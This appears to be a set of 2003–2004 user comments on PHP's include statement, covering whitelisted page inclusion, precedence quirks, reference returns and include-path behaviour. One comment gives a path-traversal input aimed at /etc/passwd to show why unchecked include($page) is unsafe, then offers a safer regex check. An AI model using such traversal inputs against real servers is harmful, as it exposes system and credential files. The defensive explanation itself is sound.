13-Apr-2004 01:27
In addition to the redeye at cs-aktuell dot de note:
to make pseudo-frame in total security
example: http://www.yourdomain.com/index.php?page=news
<?php
/* verify the validity of GET var page
if not set, do a default case */
if(isset($HTTP_GET_VARS['page']))
{
$p = $HTTP_GET_VARS['page'];
}
else
{
$p = 'index';
}
switch($p)
{
case 'index':
require('welcome.php');
break;
case 'news':
require('news.php');
break;
case 'what you want':
require('the file you want');
break;
default:
exit('Wrong parameter for file inclusion');
}
?>
marco_
moosh at php dot net
16-Jan-2004 12:03
16-Jan-2004 12:03
<?php
@include('/foo') OR die ("bar"); # <- Won't work
@(include('/foo')) OR die ("bar"); # <- Works
?>
so "or" have prority on "include"
james at gogo dot co dot nz
10-Dec-2003 03:03
10-Dec-2003 03:03
While you can return a value from an included file, and receive the value as you would expect, you do not seem to be able to return a reference in any way (except in array, references are always preserved in arrays).
For example, we have two files, file 1.php contains...
<?php
function &x(&$y)
{
return include(dirname(__FILE__) . '/2.php');
}
$z = "FOO\n";
$z2 = &x($z);
echo $z2;
$z = "NOO\n";
echo $z2;
?>
and file 2.php contains...
<?php return $y; ?>
calling 1.php will produce
FOO
FOO
i.e the reference passed to x() is broken on it's way out of the include()
Neither can you do something like <?php $foo =& include(....); ?> as that's a parse error (include is not a real function, so can't take a reference in that case). And you also can't do <?php return &$foo ?> in the included file (parse error again, nothing to assign the reference too).
The only solutions are to set a variable with the reference which the including code can then return itself, or return an array with the reference inside.
---
James Sleeman
http://www.gogo.co.nz/
david dot gaia dot kano at dartmouth dot edu
04-Dec-2003 06:13
04-Dec-2003 06:13
I just discovered a "gotcha" for the behavior of include when using the command line version of php.
I copied all the included files needed for a new version of a program into a temporary directory, so I could run them "off to the side" before they were ready for release into the live area. One of the files with a new version (call it common.inc.php for this example) normally lives in one of the directories in the include path. But I did not want to put the new version there yet! So I copied common.inc.php into my temporary directory along with the others, figuring that the interpreter would find it there before it found it in the include directory, because my include path has a . at the beginning. When I tested it, everything was fine.
But then I setup a cron job to run the script automatically every day. In the crontab I placed the full path of the script. But when it ran, it included the old version of my common.inc.php file out of the include directory. Interestingly, the other include files that only existed in the temporary directory were included fine.
Evidently AFTER the include path is searched, the directory in which the main script lives is searched as well. So my temporary installation almost worked fine, except for the lack of the small change I had made in the common file introduced a bug.
To make it work I use a shell script to start my php script. It contains a cd command into the temporary directory, then starts the php script.
So "current directory" (the . in the include path) for a command line script is really the current directory you are in when executing the script. Whereas it means the directory in which the script lives when executing under apache.
I hope this helps save someone else the hours it took me to figure out my problem!
David
php at mijav dot dk
19-Nov-2003 11:07
19-Nov-2003 11:07
The @ directive works with this construct as well. My experience is you can use an if-statement to verify if the script was included (I havn't tested this on remote includes, there might be non-standard-404 pages that makes it impossible to verify you got the right page)
Example:
// ignore the notice and evaluate the return value of the script, if any.
if(@include(dirname(__FILE__)."/foo.php"))
echo "foo.php included";
else
echo "failed to include foo.php";
redeye at cs-aktuell dot de
08-Feb-2003 10:29
08-Feb-2003 10:29
As to the security risks of an include statement like:
<?php
include($page);
?>
This is a really bad way on writing an include statement because the user could include server- or password-files which PHP can read as well. You could check the $page variable first but a simple check like
<?php
if ( file_exists($page) ) AND !preg_match("#^\.\./#",$page) )
include($page);
?>
wont make it any safer. ( Think of $page = 'pages/../../../etc/passwd' )
To be sure only pages are called you want the user to call use something like this:
<?php
$path = 'pages/';
$extension = '.php';
if ( preg_match("#^[a-z0-9_]+$#i",$page) ){
$filename = $path.$page.$extension;
include($filename);
}
?>
This will only make sure only files from the directory $path are called if they have the fileextension $extension.